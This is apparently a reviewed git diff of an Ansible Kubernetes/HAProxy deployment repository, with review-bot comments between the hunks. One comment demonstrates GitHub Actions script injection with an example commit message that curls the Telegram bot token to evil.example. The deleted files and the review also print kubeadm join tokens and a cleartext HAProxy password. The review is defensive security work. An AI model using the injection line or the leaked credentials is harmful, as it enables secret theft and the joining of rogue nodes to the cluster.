diff --git a/.github/workflows/telegram-notification.yml b/.github/workflows/telegram-notification.yml
new file mode 100644
index 0000000..2b9f393
--- /dev/null
+++ b/.github/workflows/telegram-notification.yml
@@ -0,0 +1,29 @@
+name: Telegram Notification on Commit
+
+on:
+  push:
+    branches:
+      - main
+  pull_request:
+    branches:
+      - main
+
+jobs:
+  notify:
+    runs-on: ubuntu-latest
+    steps:
+      - name: Send Telegram Message
+        run: |
+          MESSAGE="🚀 *GitHub Action Triggered!*\n"
+          MESSAGE+="🔖 *Event:* ${{ github.event_name }}\n"
+          MESSAGE+="🌐 *Repository:* [${{ github.repository }}](${{ github.server_url }}/${{ github.repository }})\n"
+          MESSAGE+="🔗 *Branch:* ${{ github.ref }}\n"
+          MESSAGE+="👤 *Actor:* [${{ github.actor }}](${{ github.server_url }}/${{ github.actor }})\n"
+          MESSAGE+="💬 *Commit Message:* '${{ github.event.head_commit.message }}'\n"
+          curl -X POST \
+            https://api.telegram.org/bot${{ secrets.TELEGRAM_BOT_TOKEN }}/sendMessage \
+            -H 'Content-Type: application/json' \
+            -d "{\"message_thread_id\": \"519\", \"chat_id\": \"${{ secrets.TELEGRAM_CHAT_ID }}\", \"text\": \"$MESSAGE\", \"parse_mode\": \"Markdown\"}"
+        env:
+          TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
+          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
diff --git a/.gitignore b/.gitignore
index 57bf3e6..d3dc450 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1 +1,3 @@
-kubeconfig
\ No newline at end of file
+kubeconfig
+roles/join_master/files/join-command
+roles/join_worker/files/join-command
\ No newline at end of file
diff --git a/README.md b/README.md
index 4a225e1..413b288 100644
--- a/README.md
+++ b/README.md
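Review bot: `${{ github.event.head_commit.message }}` (and likewise `github.actor` and `github.ref`) is expanded into the `run:` script text before bash ever parses it, so a commit message such as `'; curl https://evil.example/?t=$TELEGRAM_BOT_TOKEN #` executes on the runner with the bot token in scope — the script-injection pattern GitHub's security-hardening guide warns about — and the `pull_request` trigger makes it reachable by anyone who can open a PR from a branch of this repository (fork PRs get no secrets, but the code still runs). Pass the event fields through `env:` and use the shell variables; the step already defines `TELEGRAM_BOT_TOKEN`/`TELEGRAM_CHAT_ID` in `env:` but then ignores them in favour of inline `${{ secrets.* }}`. Build the JSON body with `jq` so a quote or backslash in a commit message cannot break out of the `text` field (today it yields a malformed request). Two smaller points: `github.event.head_commit` does not exist on `pull_request` events, so that line is empty for PRs, and the workflow declares no `permissions:` block although the job needs nothing from `GITHUB_TOKEN`; `parse_mode: Markdown` with unescaped user text will also make Telegram reject messages containing an unbalanced `*` or `_`.
```yaml
permissions: {}

jobs:
  notify:
    runs-on: ubuntu-latest
    steps:
      - name: Send Telegram Message
        env:
          TELEGRAM_BOT_TOKEN: ${{ secrets.TELEGRAM_BOT_TOKEN }}
          TELEGRAM_CHAT_ID: ${{ secrets.TELEGRAM_CHAT_ID }}
          EVENT_NAME: ${{ github.event_name }}
          REPO: ${{ github.repository }}
          SERVER_URL: ${{ github.server_url }}
          REF: ${{ github.ref }}
          ACTOR: ${{ github.actor }}
          # Untrusted text enters only as an environment variable, never as script text.
          COMMIT_MSG: ${{ github.event.head_commit.message || github.event.pull_request.title }}
        run: |
          set -euo pipefail
          MESSAGE=$(printf '🚀 *GitHub Action Triggered!*\n🔖 *Event:* %s\n🌐 *Repository:* [%s](%s/%s)\n🔗 *Branch:* %s\n👤 *Actor:* [%s](%s/%s)\n💬 *Commit Message:* %s\n' \
            "$EVENT_NAME" "$REPO" "$SERVER_URL" "$REPO" "$REF" "$ACTOR" "$SERVER_URL" "$ACTOR" "$COMMIT_MSG")
          # jq emits a correctly escaped document whatever the message contains.
          jq -n --arg chat "$TELEGRAM_CHAT_ID" --arg text "$MESSAGE" \
            '{message_thread_id: "519", chat_id: $chat, text: $text, parse_mode: "Markdown"}' \
            | curl -sS -X POST "https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage" \
                -H 'Content-Type: application/json' --data @-
```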
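Review bot: Ignoring `roles/*/files/join-command` only prevents future commits; the two files deleted later in this diff carried live `kubeadm` bootstrap tokens (`avcdgg.ck9cfh0fbivkuq37` and `qt9e7q.epmjfx2nwdkh2ojv`) for `espenu.sudoix.com:6443`, and those stay in git history for anyone with clone access. kubeadm tokens expire after 24h by default, but the files don't show the TTL used, so unless they are confirmed expired revoke them on the control plane with `kubeadm token delete avcdgg.ck9cfh0fbivkuq37` and `kubeadm token delete qt9e7q.epmjfx2nwdkh2ojv`; the discovery CA hash is not secret, but a token plus the public endpoint is enough to join a rogue node. Longer term the roles could keep the join command in a registered variable with `no_log: true` rather than a file under `files/` — I can't see where the file is written, so that is a suggestion rather than a finding.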
@@ -58,13 +58,14 @@ For join worker(s) node to cluster, follow these steps:
 ```bash
 ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t join_worker
 ```
+
 #### If you like to use haproxy for loadbalancing in your kubernetes you can use these bellow step.
-```basb
+```bash
 ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t lb
 ```
-and for finilize use
+and for finilize use (If you use lb tag you MUST run the postinstall task)
 ```bash
 ansible-playbook -i inventory/k8s-servers.ini kubernetes.yml --become --become-method=sudo -t postinstall
diff --git a/inventory/group_vars/all.yml b/inventory/group_vars/all.yml
index c2f516b..e59461e 100644
--- a/inventory/group_vars/all.yml
+++ b/inventory/group_vars/all.yml
@@ -6,40 +6,35 @@ setup_interface: "false"
 #SSH
 ssh_port: 2222
-# Network Calico
-
-calico_operator_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.27.0/manifests/tigera-operator.yaml"
-calico_crd_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.27.0/manifests/custom-resources.yaml"
+# Network Calico see here for more details https://github.com/projectcalico/calico/releases
+calico_operator_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.29.0/manifests/tigera-operator.yaml"
+calico_crd_url: "https://raw.githubusercontent.com/projectcalico/calico/v3.29.0/manifests/custom-resources.yaml"
 pod_network_cidr: "192.168.0.0/16"
 # DNS
-
-resolv_nameservers: [178.22.122.100, 185.51.200.2] # 403.online
+resolv_nameservers: [8.8.8.8, 4.2.2.4] # 403.online
 # Sanction shekan
-
 use_iran: "true" # change it to "false" if you are outside of iran
 # Docker
-
 docker_gpg_key_url: "https://download.docker.com/linux/ubuntu/gpg"
 docker_gpg_key_path: "/etc/apt/keyrings/docker.gpg"
 docker_apt_repo: "https://download.docker.com/linux/ubuntu"
 # Kubernetes
-
 kubernetes_gpg_keyring_path: "/etc/apt/keyrings/kubernetes-apt-keyring.gpg"
-kubernetes_gpg_key_url: "https://pkgs.k8s.io/core:/stable:/v1.28/deb/Release.key"
-kubernetes_apt_repo: "https://pkgs.k8s.io/core:/stable:/v1.28/deb/"
-k8s_version: "1.28.5"
+kubernetes_gpg_key_url: "https://pkgs.k8s.io/core:/stable:/v1.31/deb/Release.key"
+kubernetes_apt_repo: "https://pkgs.k8s.io/core:/stable:/v1.31/deb/"
+k8s_version: "1.31.2" # see here https://kubernetes.io/releases/patch-releases/ and https://github.com/kubernetes/kubernetes/releases
 # CRI
-
 cri_socket: unix:///var/run/containerd/containerd.sock
-# lb
-
-virtual_ip: "172.16.100.100"
+# VRRP and HAProxy
+interface_name: "enp0s8"
+virtual_ip: "192.168.178.100"
+haproxy_frontend_password: "121password121"
 # Disk
diff --git a/inventory/k8s-servers.ini b/inventory/k8s-servers.ini
index 96eee11..2c5da03 100644
--- a/inventory/k8s-servers.ini
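Review bot: `haproxy_frontend_password: "121password121"` commits a working HAProxy stats credential in clear text to `group_vars/all.yml`, a file that is plainly environment-specific and will be copied and forked with the repository. Keep the key but source the value from Ansible Vault or the environment, e.g. `haproxy_frontend_password: "{{ vault_haproxy_frontend_password }}"` with `vault_haproxy_frontend_password` in an encrypted `group_vars/all/vault.yml`, and rotate the value that is now in git history. Also misleading: the `# 403.online` comment now sits beside `8.8.8.8, 4.2.2.4`, which are Google and Level 3 resolvers, so it should be dropped or corrected. Minor style: `use_iran: "true"` compared with `== "true"` works, but a real boolean with `when: use_iran | bool` is the idiomatic Ansible form.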
+++ b/inventory/k8s-servers.ini
@@ -1,16 +1,16 @@
 [all]
 # the first node is the first master node (k8s-test-master1)
-k8s-test-master1 ansible_host=37.152.178.226 private_ip=172.16.100.11
-k8s-test-master2 ansible_host=185.97.118.58 private_ip=172.16.100.21
-k8s-test-master3 ansible_host=37.152.182.216 private_ip=172.16.100.31
+k8s-test-master1 ansible_host=192.168.178.11 private_ip=192.168.178.11
+k8s-test-master2 ansible_host=192.168.178.12 private_ip=192.168.178.12
+k8s-test-master3 ansible_host=192.168.178.13 private_ip=192.168.178.13
-k8s-test-worker1 ansible_host=37.32.21.250 private_ip=172.16.100.41
-; k8s-test-worker2 ansible_host=172.24.96.6 private_ip=172.16.100.22
+k8s-test-worker1 ansible_host=192.168.178.21 private_ip=192.168.178.21
+; k8s-test-worker2 ansible_host=192.168.178.22 private_ip=192.168.178.22
 ; k8s-test-worker3 ansible_host=172.24.96.7 private_ip=172.16.100.23
-lb1-test ansible_host=185.206.92.135 private_ip=172.16.100.81
-lb2-test ansible_host=185.206.92.220 private_ip=172.16.100.91
+lb1-test ansible_host=192.168.178.50 private_ip=192.168.178.50
+lb2-test ansible_host=192.168.178.60 private_ip=192.168.178.60
 [k8s]
 k8s-test-master1
@@ -27,8 +27,8 @@ k8s-test-master3
 [k8s_workers]
 k8s-test-worker1
-# k8s-test-worker2
-# k8s-test-worker3
+; k8s-test-worker2
+; k8s-test-worker3
 [lb]
diff --git a/kubernetes.yml b/kubernetes.yml
index f41406e..5e9dfc1 100644
--- a/kubernetes.yml
+++ b/kubernetes.yml
@@ -14,7 +14,7 @@
 - hosts: k8s
   roles:
-    - role: k8s
+    - role: init_k8s
   gather_facts: yes
   any_errors_fatal: true
   tags: [init_k8s]
@@ -22,6 +22,8 @@
 - hosts: k8s_masters
   roles:
+    - role: preinstall
+    - role: k8s
     - role: join_master
   gather_facts: yes
   any_errors_fatal: true
@@ -29,6 +31,8 @@
 - hosts: k8s_workers
   roles:
+    - role: preinstall
+    - role: k8s
     - role: join_worker
   gather_facts: yes
   any_errors_fatal: true
diff --git a/roles/init_k8s/tasks/initk8s.yaml b/roles/init_k8s/tasks/initk8s.yaml
index 89354aa..56786b2 100644
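Review bot: In the kubernetes.yml hunks the `init_k8s` play on `hosts: k8s` now runs before the plays that apply `preinstall` and `k8s` to `k8s_masters` and `k8s_workers`, so unless the plays above line 14 (outside the hunk) already prepare every node, `kubeadm init` on the first master would execute before the containerd, swap-off and ufw handling that the `k8s` role provides; if they do, the added roles simply re-run those tasks a second time on each node. Please confirm the intended ordering against the README flow, or move the `init_k8s` play after the preparation plays. Minor: `gather_facts: yes` is a YAML 1.1 truthy spelling; `gather_facts: true` is what ansible-lint asks for.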
--- a/roles/init_k8s/tasks/initk8s.yaml
+++ b/roles/init_k8s/tasks/initk8s.yaml
@@ -41,7 +41,7 @@
   when: inventory_hostname == groups['k8s_masters'][0]
   delegate_to: "{{ groups['k8s_masters'][0] }}"
-- name: Sleep for 300 seconds and reboot the Master1 server
+- name: Sleep for 300 seconds and reboot the Master1 server | because we live in Iran :D
   wait_for:
     timeout: 300
   delegate_to: localhost
@@ -50,13 +50,14 @@
   command: reboot
   async: 1
   poll: 0
-  ignore_errors: yes
+  # ignore_errors: yes
   delegate_to: "{{ groups['k8s_masters'][0] }}"
-- name: Sleep for 300 seconds to Master1 up and running
+- name: Sleep for 300 seconds to Master1 up and running | because we live in Iran :D
   wait_for:
     timeout: 300
   delegate_to: localhost
+  # when: use_iran == "true"
 - name: Example Task After Reboot
   debug:
diff --git a/roles/join_master/files/join-command b/roles/join_master/files/join-command
deleted file mode 100644
index aead8bd..0000000
--- a/roles/join_master/files/join-command
+++ /dev/null
@@ -1 +0,0 @@
-kubeadm join espenu.sudoix.com:6443 --token avcdgg.ck9cfh0fbivkuq37 --discovery-token-ca-cert-hash sha256:8b5e16f9c548de3b34bb0f007e927f4c9eb315dd1bf8e32846a6f6dc1c67d391 $@
\ No newline at end of file
diff --git a/roles/join_worker/files/join-command b/roles/join_worker/files/join-command
deleted file mode 100644
index 115bd5a..0000000
--- a/roles/join_worker/files/join-command
+++ /dev/null
@@ -1 +0,0 @@
-kubeadm join espenu.sudoix.com:6443 --token qt9e7q.epmjfx2nwdkh2ojv --discovery-token-ca-cert-hash sha256:8b5e16f9c548de3b34bb0f007e927f4c9eb315dd1bf8e32846a6f6dc1c67d391 $@
\ No newline at end of file
diff --git a/roles/k8s/tasks/k8s.yaml b/roles/k8s/tasks/k8s.yaml
index d5c4306..a601a1e 100644
--- a/roles/k8s/tasks/k8s.yaml
+++ b/roles/k8s/tasks/k8s.yaml
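Review bot: Commenting out `ignore_errors: yes` on the `command: reboot` task (second hunk) makes the play depend on the SSH session surviving until the async launch is acknowledged; when the host drops first, `command` returns an error and `any_errors_fatal` aborts the whole run, which is the very failure the ignore was masking. The sleep-300 / reboot / sleep-300 sequence can be replaced by `ansible.builtin.reboot`, which tolerates the connection drop and polls for the host to come back rather than waiting a fixed ten minutes; whatever `when:` guards the reboot task sits above the hunk, so I have reproduced the one visible on the neighbouring task. Also `# when: use_iran == "true"` is left commented, so the fixed waits run for everyone despite the new task names.
```yaml
- name: Reboot Master1 and wait for it to come back
  ansible.builtin.reboot:
    reboot_timeout: 600
  delegate_to: "{{ groups['k8s_masters'][0] }}"
  when: inventory_hostname == groups['k8s_masters'][0]
# … unchanged: Example Task After Reboot …
```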
@@ -8,9 +8,14 @@
       regexp: '^([^#].*?\sswap\s+sw\s+.*)$'
       replace: '# \1'
+- name: Check if ufw is installed
+  package_facts:
+    manager: "auto"
+
 - name: Disable ufw # just in Ubuntu
   ufw:
     state: disabled
+  when: "'ufw' in ansible_facts.packages"
 - name: Ensure kernel modules for containerd are enabled
   lineinfile:
diff --git a/roles/lb/tasks/basic.yaml b/roles/lb/tasks/basic.yaml
index da0142a..7e3e594 100644
--- a/roles/lb/tasks/basic.yaml
+++ b/roles/lb/tasks/basic.yaml
@@ -18,7 +18,7 @@
     src: keepalived.conf.j2
     dest: /etc/keepalived/keepalived.conf
-- name: Start and enable the keepalived service
+- name: Retart and enable the keepalived service
   ansible.builtin.service:
     name: keepalived
     state: restarted
diff --git a/roles/lb/templates/haproxy.cfg.j2 b/roles/lb/templates/haproxy.cfg.j2
index f83a259..d9c0b6c 100644
--- a/roles/lb/templates/haproxy.cfg.j2
+++ b/roles/lb/templates/haproxy.cfg.j2
@@ -1,3 +1,16 @@
+# HAProxy Statistics Report Page
+frontend stats-frontend
+    bind *:8080
+    mode http
+    stats enable
+    stats hide-version
+    stats uri /stats
+    stats realm Haproxy\ Statistics
+    stats auth admin:{{ haproxy_frontend_password }} # Change 'admin:password' to your desired strong username and password
+
+# No backend is required for exporting stats in HAProxy.
+
+
 frontend kubernetes-frontend
     bind *:6443
     mode tcp
diff --git a/roles/lb/templates/keepalived.conf.j2 b/roles/lb/templates/keepalived.conf.j2
index 1a68983..1764815 100644
--- a/roles/lb/templates/keepalived.conf.j2
+++ b/roles/lb/templates/keepalived.conf.j2
@@ -9,7 +9,7 @@ vrrp_script check_apiserver {
 vrrp_instance VI_1 {
     state BACKUP
-    interface eth1 # set your interface
+    interface {{ interface_name }} # set your interface
     virtual_router_id 1
     priority 100
     advert_int 5
diff --git a/roles/preinstall/handlers/main.yml b/roles/preinstall/handlers/main.yml
index 7bed45b..bf777a0 100644
--- a/roles/preinstall/handlers/main.yml
+++ b/roles/preinstall/handlers/main.yml
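Review bot: `bind *:8080` in the new `stats-frontend` exposes the stats page on every interface of the lb nodes over plain HTTP, so the Basic-Auth password from `haproxy_frontend_password` crosses the wire in clear and can be brute-forced from wherever port 8080 is reachable (the inventory in this same diff previously gave these hosts public addresses). Bind it to the node's private or loopback address, `bind {{ private_ip }}:8080` or `bind 127.0.0.1:8080`, and put TLS in front of it if it must be reachable remotely. The trailing comment `# Change 'admin:password' to your desired strong username and password` is now stale: the password is templated but the username stays hard-coded as `admin`, so either template both, `stats auth {{ haproxy_stats_user }}:{{ haproxy_frontend_password }}`, or reword the comment to say the password is set in `group_vars`. `stats hide-version` is fine but does nothing for the reachability of the endpoint itself.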
@@ -3,5 +3,5 @@
 - name: restart sshd
   service:
-    name: sshd
+    name: ssh
     state: restarted
\ No newline at end of file
diff --git a/roles/preinstall/tasks/basic.yaml b/roles/preinstall/tasks/basic.yaml
index 487d8f9..792c809 100644
--- a/roles/preinstall/tasks/basic.yaml
+++ b/roles/preinstall/tasks/basic.yaml
@@ -10,6 +10,7 @@
     path: "/etc/resolv.conf"
     state: absent
   ignore_errors: true
+  when: use_iran == "true"
 - name: Configure resolv.conf | Comment this task if you live in outside of Iran :)
   template:
@@ -82,6 +83,7 @@
     - open-iscsi
     - nfs-common
     - tzdata
+    - tree
     # - bpytop
     state: latest
     update_cache: true
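Review bot: The new `when: use_iran == "true"` guards the removal of `/etc/resolv.conf`, but the task right after it, `Configure resolv.conf | Comment this task if you live in outside of Iran :)`, still tells the user to edit the playbook by hand; its body lies outside the hunk, so if it carries no matching condition the template is written even with `use_iran: "false"`, and if it does, the task name is now misleading. Give both tasks the same condition and rename the second, e.g. `- name: Configure resolv.conf` followed by `when: use_iran == "true"` after its `template:` arguments. On the handler hunk, `name: ssh` is the Debian/Ubuntu unit name while `sshd` is what RHEL-family hosts use, so the rename ties the role to Debian-based targets (consistent with the apt repositories in `group_vars`); a one-line comment saying so would save the next person a surprise.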